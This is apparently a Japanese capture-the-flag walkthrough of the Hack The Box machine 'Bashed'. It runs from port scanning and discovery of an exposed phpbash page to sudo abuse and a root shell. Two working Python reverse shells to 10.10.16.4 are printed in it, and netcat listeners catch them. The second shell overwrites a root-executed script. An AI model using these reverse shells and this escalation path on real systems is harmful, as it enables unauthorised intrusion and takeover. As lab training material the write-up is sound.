
HTB Bashed

ポート探索

nmap

$ nmap -sCV -A -v -Pn -p- --min-rate 5000 10.10.10.68 -oN nmap_result.txt

<<SNIP>>
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 6AA5034A553DFA77C3B2C7B4C26CF870
|_http-title: Arrexel's Development Site
<<SNIP>>

80番ポートの探索


画面
phpbashのデモ画面
$ feroxbuster -u http://10.10.10.68/ -d 2 -C 403,404,500

<<SNIP>>
200      GET        1l      255w     4559c http://10.10.10.68/dev/phpbash.min.php
200      GET      216l      489w     8151c http://10.10.10.68/dev/phpbash.php
200      GET        0l        0w        0c http://10.10.10.68/php/sendMail.php
<<SNIP>>

Privilege Escalation

sudo -l

www-data@bashed:/home/arrexel# sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL

Reverse Shell

www-data@bashed:/home# export RHOST="10.10.16.4";export RPORT=9001;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
$ nc -lnvp 9001                                                          
listening on [any] 9001 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.68] 39484
www-data@bashed:/home$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@bashed:/home$ 

scriptmanagerユーザーになる

www-data@bashed:/tmp$ sudo -u scriptmanager bash -i
sudo -u scriptmanager bash -i
scriptmanager@bashed:/tmp$ 
scriptmanager@bashed:/tmp$ ls -l /
ls -l /
total 80
drwxr-xr-x   2 root          root           4096 Jun  2  2022 bin
drwxr-xr-x   3 root          root           4096 Jun  2  2022 boot
drwxr-xr-x  19 root          root           4140 Nov 26 15:28 dev
drwxr-xr-x  89 root          root           4096 Jun  2  2022 etc
drwxr-xr-x   4 root          root           4096 Dec  4  2017 home
lrwxrwxrwx   1 root          root             32 Dec  4  2017 initrd.img -> boot/initrd.img-4.4.0-62-generic
drwxr-xr-x  19 root          root           4096 Dec  4  2017 lib
drwxr-xr-x   2 root          root           4096 Jun  2  2022 lib64
drwx------   2 root          root          16384 Dec  4  2017 lost+found
drwxr-xr-x   4 root          root           4096 Dec  4  2017 media
drwxr-xr-x   2 root          root           4096 Jun  2  2022 mnt
drwxr-xr-x   2 root          root           4096 Dec  4  2017 opt
dr-xr-xr-x 175 root          root              0 Nov 26 15:27 proc
drwx------   3 root          root           4096 Nov 26 15:30 root
drwxr-xr-x  18 root          root            520 Nov 27 06:25 run
drwxr-xr-x   2 root          root           4096 Dec  4  2017 sbin
drwxrwxr--   2 scriptmanager scriptmanager  4096 Jun  2  2022 scripts
drwxr-xr-x   2 root          root           4096 Feb 15  2017 srv
dr-xr-xr-x  13 root          root              0 Nov 27 12:33 sys
drwxrwxrwt  10 root          root           4096 Nov 27 12:38 tmp
drwxr-xr-x  10 root          root           4096 Dec  4  2017 usr
drwxr-xr-x  12 root          root           4096 Jun  2  2022 var
lrwxrwxrwx   1 root          root             29 Dec  4  2017 vmlinuz -> boot/vmlinuz-4.4.0-62-generic
scriptmanager@bashed:/tmp$ cd /scripts
cd /scripts
scriptmanager@bashed:/scripts$ ls -al
ls -al
total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Jun  2  2022 .
drwxr-xr-x 23 root          root          4096 Jun  2  2022 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 Nov 27 12:38 test.txt

test.pyの内容を以下のように書き換える

# Replacement contents for /scripts/test.py. The directory listing above
# shows test.py owned by and writable for scriptmanager, while the test.txt
# next to it is root-owned with a recent mtime.
# NOTE(review): the root shell that follows implies something running as root
# executes this file (presumably periodically) -- the page does not show what.
# The defensive fix is the same either way: a root-run job must not execute a
# file living in a directory a lower-privileged account can write to, and the
# NOPASSWD sudo rule that lets www-data become scriptmanager should go.
import socket,subprocess,os  # subprocess is imported but never used below
# TCP socket back to the listener started below (nc -lnvp 9002).
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.16.4",9002))
# Duplicate the socket onto stdin/stdout/stderr so the shell spawned next
# reads from and writes to the connection.
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
# Spawn bash on a pseudo-terminal; it inherits the redirected fds above.
import pty; pty.spawn("bash")
$ nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.68] 57904
root@bashed:/scripts# ls
ls
test.py  test.txt
root@bashed:/scripts# id
id
uid=0(root) gid=0(root) groups=0(root)
root@bashed:/scripts# 
